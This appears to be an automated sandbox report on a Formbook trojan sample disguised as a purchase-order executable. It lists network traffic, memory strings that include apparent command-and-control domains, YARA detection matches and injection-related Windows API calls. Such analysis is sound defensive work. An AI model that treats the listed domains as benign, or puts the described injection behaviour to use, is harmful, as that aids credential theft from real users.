74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 
3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:45:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 03 Jul 2024 15:45:45 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XFrXUQcFDDEiqb72IIX6SrlFe6lJzAA3y42PLVBB13qTJE17jWIDkCN%2FR%2Fs%2B28FN6pv3b0Eu1g0RD0JPfS8Dp3oDmJppFcRyROYAO6%2F3OA9YyrMYts3YDF7utPMW5aV4PiU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d80122accd9e17-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:45:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 03 Jul 2024 15:45:48 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZHcX112AokBwQdDEHKMaPkfF7gEUIi5z68v0aWSVGm9x9ZmoaSMKuuxK7p%2B%2F%2BX9VkxsGrJUXtDAY%2Fndyx8hn%2FXvZdDBN4UId9%2Fq2tYe%2BzlDhnRe7dhw%2BqTe%2BEJLOkS%2FNZ8O"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d801327fc78c2f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:45:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 03 Jul 2024 15:45:50 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjArDonv2pTcI0hM0k0wREXanriOIzukuI%2FrN1I9O1lkIS%2FV1c8dp25Q8G96B08H9n9xe0DikIzMvdACYt3yj6uJyWHcHPsvuhMojXYyM2MhgBtGjd1BJNLN0u9gK4Z84euI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d801426eb843f3-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:45:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 03 Jul 2024 15:45:53 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vWFpWTfdjtGMBArT2pMmuXCyYhpQvxVmlwJcSJPG33KFzDIUm4xeRsWwzfio0JhhUGQq%2FBiMekIj2hpzm7n7EIZbB59Z3F2HJn%2Bdjp6xRnKcV%2FhoHx%2FMSXbTk8a3bgrLDMI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d801524d917271-EWR alt-svc: h3=":443"; ma=86400 Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 15:45:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 162 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 15:46:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 162 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 15:46:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 162 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 15:46:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 162 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 03 Jul 2024 15:46:12 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 03 Jul 2024 15:46:14 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 03 Jul 2024 15:46:17 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Wed, 03 Jul 2024 15:46:19 GMT Server: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 15:46:39 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 15:46:42 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 15:46:45 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 15:46:47 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 03 Jul 2024 15:46:53 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 03 Jul 2024 15:46:55 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 03 Jul 2024 15:46:58 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Wed, 03 Jul 2024 15:47:00 GMT Server: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: fc.exe, 00000009.00000002.4153435982.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000036BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goge8opp.com:301
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.saalameh.com
            Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.saalameh.com/hfb9/
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: fc.exe, 00000009.00000003.2332367117.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: fc.exe, 00000009.00000002.4153435982.0000000004282000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZ
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0042B2E3 NtClose,3_2_0042B2E3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932B60 NtClose,LdrInitializeThunk,3_2_01932B60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01932DF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01932C70
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019335C0 NtCreateMutant,LdrInitializeThunk,3_2_019335C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01934340 NtSetContextThread,3_2_01934340
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01934650 NtSuspendThread,3_2_01934650
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932B80 NtQueryInformationFile,3_2_01932B80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932BA0 NtEnumerateValueKey,3_2_01932BA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932BF0 NtAllocateVirtualMemory,3_2_01932BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932BE0 NtQueryValueKey,3_2_01932BE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932AB0 NtWaitForSingleObject,3_2_01932AB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932AD0 NtReadFile,3_2_01932AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932AF0 NtWriteFile,3_2_01932AF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932DB0 NtEnumerateKey,3_2_01932DB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932DD0 NtDelayExecution,3_2_01932DD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932D10 NtMapViewOfSection,3_2_01932D10
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932D00 NtSetInformationFile,3_2_01932D00
